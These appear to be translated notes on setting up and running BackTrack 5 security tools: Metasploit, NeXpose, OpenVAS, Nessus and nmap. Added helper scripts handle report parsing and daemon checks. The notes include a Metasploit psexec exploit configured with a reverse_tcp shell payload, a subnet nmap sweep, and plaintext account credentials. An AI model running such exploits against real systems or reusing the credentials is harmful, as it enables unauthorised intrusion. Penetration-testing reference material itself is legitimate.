Summary of common tool operation tips in BT5
Use nmap, Nessus, OpenVAS and NeXpose to obtain CVE numbers, BIDs and other descriptive information, then search exploit-db.com and 1337.com to see whether attack code exists.
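The first step of that workflow is getting the CVE and BID identifiers out of whatever report the scanner produced. The script below is an added example, not part of the original notes and not a tool from any of the scanners named: it matches the identifier syntax rather than one scanner's XML schema, so the same function works on a .nessus file, a NeXpose Simple XML export or nmap -oX output. The sample report fragment and the identifiers in it are constructed placeholders; the assumption that BIDs appear as "BID-<number>" is noted in the code (Nessus, for instance, writes the bare number in a <bid> element, so normalise first if needed).

```shell
#!/bin/sh
# Added example, not from the original notes: pull CVE and BID identifiers out of a
# scanner report so they can be looked up in a vulnerability database. It matches the
# identifier syntax instead of one scanner's schema, so the same function works on a
# .nessus file, NeXpose Simple XML, or nmap -oX output.

# extract_ids FILE: print every distinct identifier found in FILE, one per line, sorted.
# Assumption: BIDs appear as "BID-<number>"; normalise first if your scanner writes them
# differently (e.g. Nessus puts the bare number in a <bid> element).
extract_ids() {
    LC_ALL=C grep -oE 'CVE-[0-9]{4}-[0-9]{4,}|BID-[0-9]+' "$1" | LC_ALL=C sort -u
}

# count_ids FILE: number of distinct identifiers, for a quick triage summary.
count_ids() {
    extract_ids "$1" | wc -l | tr -d ' '
}

# Constructed sample report fragment (placeholder identifiers, not real findings),
# written to a temp file so the example runs offline. Note the duplicated CVE in
# findings 2 and 3: it must be reported once.
SAMPLE_REPORT="$(mktemp)"
cat > "$SAMPLE_REPORT" <<'EOF'
<vulnerabilities>
  <vulnerability id="finding-1"><id type="cve">CVE-2000-1111</id><id type="bid">BID-12345</id></vulnerability>
  <vulnerability id="finding-2"><id type="cve">CVE-2000-2222</id></vulnerability>
  <vulnerability id="finding-3"><id type="cve">CVE-2000-2222</id></vulnerability>
</vulnerabilities>
EOF

echo "$(count_ids "$SAMPLE_REPORT") distinct identifiers:"
extract_ids "$SAMPLE_REPORT"
```

On a real report, run `extract_ids report.xml` and feed the list to whichever database search you use; the dedup step matters because scanners repeat the same CVE once per host and per plugin.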
0. Firewall: ufw, gufw
Metasploit Framework:
exploits: modules that use a PAYLOAD; modules that do not use a PAYLOAD are Auxiliary modules
payload: the code that runs on the remote target host
encoders: help the PAYLOAD reach the target host
Nops: pad the PAYLOAD to the required size
############################
Choose .nessus (v1) as the format for reports generated by Nessus.
Example of using an exploit:
1) use exploit/windows/smb/psexec
   set RHOST remoteip
   set PAYLOAD windows/shell/reverse_tcp   # set the payload, i.e. the code that runs on the remote target host; usually one that provides a remote network service or a reverse connection
   set LHOST listenip   # must be set when the PAYLOAD is a reverse connection
   set LPORT 4444
   set etc…
   exploit
########################################################################
1. NeXpose
The scanner from Rapid7 (which acquired MSF); it corresponds to MSF, and vulnerabilities marked exploitable carry links to the matching MSF attack modules.
NeXpose's default PostgreSQL user is nxpgsql; port: 3780; the number of hosts per scan is limited to 8.
Choose NeXpose Simple XML as the generated report format.
nxadmin:A
Starting:
Go to the directory that contains the script that starts NeXpose:
$ cd [installation_directory]/nsc
Type the command to run the script:
$ ./nsc.sh
You can then see the running background console messages.
Or:
/etc/init.d/nexposed restart   (start it as a daemon)
Web access:
http://ip:3780
Where the name nexposed comes from (setting NeXpose up as a daemon, from the NeXpose Software Installation and Quick-start Guide, page 16):
$ cd [installation_directory]/nsc
Open the nexposeconsole.rc file in your preferred text editing program.
Look for two consecutive lines that read:
#defines
NXP_ROOT=/opt/rapid7/nexpose
The directory in the second line is the default installation directory.
If you did not use the default directory for installation, change the directory path to the one you chose:
#defines
NXP_ROOT=[installation_directory]
Save and close the nexposeconsole.rc file.
Copy the nexposeconsole.rc file to the /etc/init.d directory, and give it the desired daemon name:
$ cp [installation_directory]/nexposeconsole.rc /etc/init.d/[daemon_name]
Ensure that the daemon can run:
$ chmod +x /etc/init.d/[daemon_name]
Make the daemon start when the operating system starts:
$ update-rc.d [daemon_name] defaults
Manually starting, stopping, or restarting NeXpose as a daemon in Ubuntu
To manually start, stop, or restart NeXpose as a daemon:
$ /etc/init.d/[daemon_name] <start|stop|restart>
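The daemon setup above is a copy-edit-chmod-register sequence that is easy to get wrong by hand (a forgotten NXP_ROOT edit starts NeXpose from a path that does not exist). The script below is an added example, not from the NeXpose guide or the original notes: it generates the daemon script from nexposeconsole.rc with NXP_ROOT rewritten to the real installation directory, refuses to produce a script when the source has no NXP_ROOT line, and keeps the root-only copy into /etc/init.d and update-rc.d registration in a separate function you call deliberately. The nexposeconsole.rc it writes is a constructed stand-in (only the two lines the guide names), and the install path /srv/nexpose is an arbitrary choice.

```shell
#!/bin/sh
# Added example (not from the NeXpose guide or the original notes): build the
# /etc/init.d daemon script from nexposeconsole.rc with the NXP_ROOT line pointed at
# the real installation directory, then mark it executable. Copying into /etc/init.d
# and registering with update-rc.d need root, so that step is a separate function.

# make_daemon_script SRC DEST INSTALL_DIR
#   Copy SRC (nexposeconsole.rc) to DEST, rewriting the "NXP_ROOT=..." line so it
#   points at INSTALL_DIR, and make DEST executable. Fails without writing DEST if SRC
#   has no NXP_ROOT line, because such a script would start NeXpose from the wrong path.
make_daemon_script() {
    src="$1"; dest="$2"; root="$3"
    grep -q '^NXP_ROOT=' "$src" || { echo "no NXP_ROOT line in $src" >&2; return 1; }
    # '|' as the sed delimiter so a path full of '/' needs no escaping
    sed "s|^NXP_ROOT=.*|NXP_ROOT=${root}|" "$src" > "$dest"
    chmod +x "$dest"
}

# nxp_root_of FILE: print the NXP_ROOT value FILE will use, to verify before installing.
nxp_root_of() {
    sed -n 's/^NXP_ROOT=//p' "$1"
}

# install_daemon SCRIPT NAME: root-only step. Copies SCRIPT to /etc/init.d/NAME and
# enables it at boot with update-rc.d, the Debian/Ubuntu tool the guide uses.
install_daemon() {
    cp "$1" "/etc/init.d/$2" && update-rc.d "$2" defaults
}

# Constructed stand-in for nexposeconsole.rc so the example runs without NeXpose.
TMPDIR_NXP="$(mktemp -d)"
cat > "$TMPDIR_NXP/nexposeconsole.rc" <<'EOF'
#!/bin/sh
#defines
NXP_ROOT=/opt/rapid7/nexpose
# ... the rest of the vendor script would follow here (constructed placeholder)
EOF

# Assumed installation directory for the demonstration.
make_daemon_script "$TMPDIR_NXP/nexposeconsole.rc" "$TMPDIR_NXP/nexposed" /srv/nexpose
echo "daemon script uses NXP_ROOT=$(nxp_root_of "$TMPDIR_NXP/nexposed")"
# As root on the real system: install_daemon "$TMPDIR_NXP/nexposed" nexposed
```

Checking `nxp_root_of` against the directory you actually installed into, before calling `install_daemon`, catches the wrong-path mistake while it is still cheap to fix.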
Uninstalling NeXpose:
1. Make sure to stop NeXpose. Otherwise, errors will occur when you reinstall the program.
If you are not running NeXpose as a daemon, simply type the quit command, and press Enter in the shell
in which you are running NeXpose.
If you are running NeXpose as a daemon, see Manually starting, stopping, or restarting NeXpose as a daemon in
Ubuntu (on page 16).
2. Run the command to remove the program:
$ rm -fr [installation_directory]
####################################################
2. OpenVAS:
root:shift(AB) (local id; pwd is A)
wangql:wangql#@!
Starting:
Enter on the command line:
openvassd
openvasmd
openvasad
gsad --http-only -a 127.0.0.1 -p 9392
openvasmd: the manager, port 9390
openvasmd [OPTION...] - Manager of the Open Vulnerability Assessment System
gsad: Greenbone Security Assistant daemon, port 9392
gsad --http-only -a 127.0.0.1 -p 9392   # only when started this way can gsad be reached from the web
Caution: there is a conflict between NeXpose and OpenVAS, especially with the gsad command above, so uninstall NeXpose before using gsad.
openvasad: the administrator, used to add users, port 9393
Ports: 9390, 9391, 9392, 9393
FIX: Start OpenVAS Scanner (openvassd).
FIX: Start OpenVAS Manager (openvasmd).
FIX: Start OpenVAS Administrator (openvasad).
FIX: Start Greenbone Security Assistant (gsad).
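When one of those FIX messages appears, the quickest way to see which daemon is missing is to check which of the four ports is not listening. The script below is an added example, not part of the original notes or of OpenVAS itself: it takes the output of `ss -lnt` or `netstat -lnt`, checks each port, and prints the same FIX hint the notes list for every daemon that is down. The port-to-daemon mapping for 9390 (manager), 9392 (gsad) and 9393 (administrator) is the one in the notes; mapping 9391 to the scanner (openvassd) is an assumption stated in the code. The listener table in the block is constructed sample output in which only the manager and gsad are up.

```shell
#!/bin/sh
# Added example (not part of the original notes): check which OpenVAS daemons are
# actually listening on their default ports and print the "FIX:" hint for each one
# that is not, so you know what to start. 9390/9392/9393 come from the notes;
# 9391 = scanner (openvassd) is an assumption.

# openvas_fixes LISTENERS: LISTENERS is text such as the output of `ss -lnt` or
# `netstat -lnt`. Prints one FIX line per daemon whose port is absent, nothing when all
# four are up. Exit status is the number of missing daemons (0 = all running).
openvas_fixes() {
    listeners="$1"; missing=0
    for entry in \
        "9391:OpenVAS Scanner (openvassd)" \
        "9390:OpenVAS Manager (openvasmd)" \
        "9393:OpenVAS Administrator (openvasad)" \
        "9392:Greenbone Security Assistant (gsad)"; do
        port="${entry%%:*}"; name="${entry#*:}"
        # the local-address column ends in ":PORT" (or ".PORT" on BSD netstat),
        # followed by whitespace; requiring the whitespace stops 9390 matching 93900
        if ! printf '%s\n' "$listeners" | grep -qE "[:.]${port}[[:space:]]"; then
            echo "FIX: Start ${name}."
            missing=$((missing + 1))
        fi
    done
    return "$missing"
}

# live_listeners: current listening TCP sockets, using ss if present, else netstat.
live_listeners() {
    if command -v ss >/dev/null 2>&1; then ss -lnt; else netstat -lnt; fi
}

# Constructed sample (not real output): only the manager and gsad are listening.
SAMPLE_LISTENERS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    127.0.0.1:9390      0.0.0.0:*
LISTEN 0      128    127.0.0.1:9392      0.0.0.0:*'

openvas_fixes "$SAMPLE_LISTENERS" || echo "$? daemon(s) still need to be started"
# On a real box: openvas_fixes "$(live_listeners)"
```

Because the exit status counts the missing daemons, the function also works as a readiness check in a startup script: loop until it returns 0 before opening the web interface.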
####################################################
3. Nessus
4. nmap
nmap -A -T4 192.168.10.3-254 -p 135
5. load xmlrpc
Then open it with Armitage.
msfconsole does not support displaying Chinese character encodings.
info exploit/windows/wins/ms04_045_ins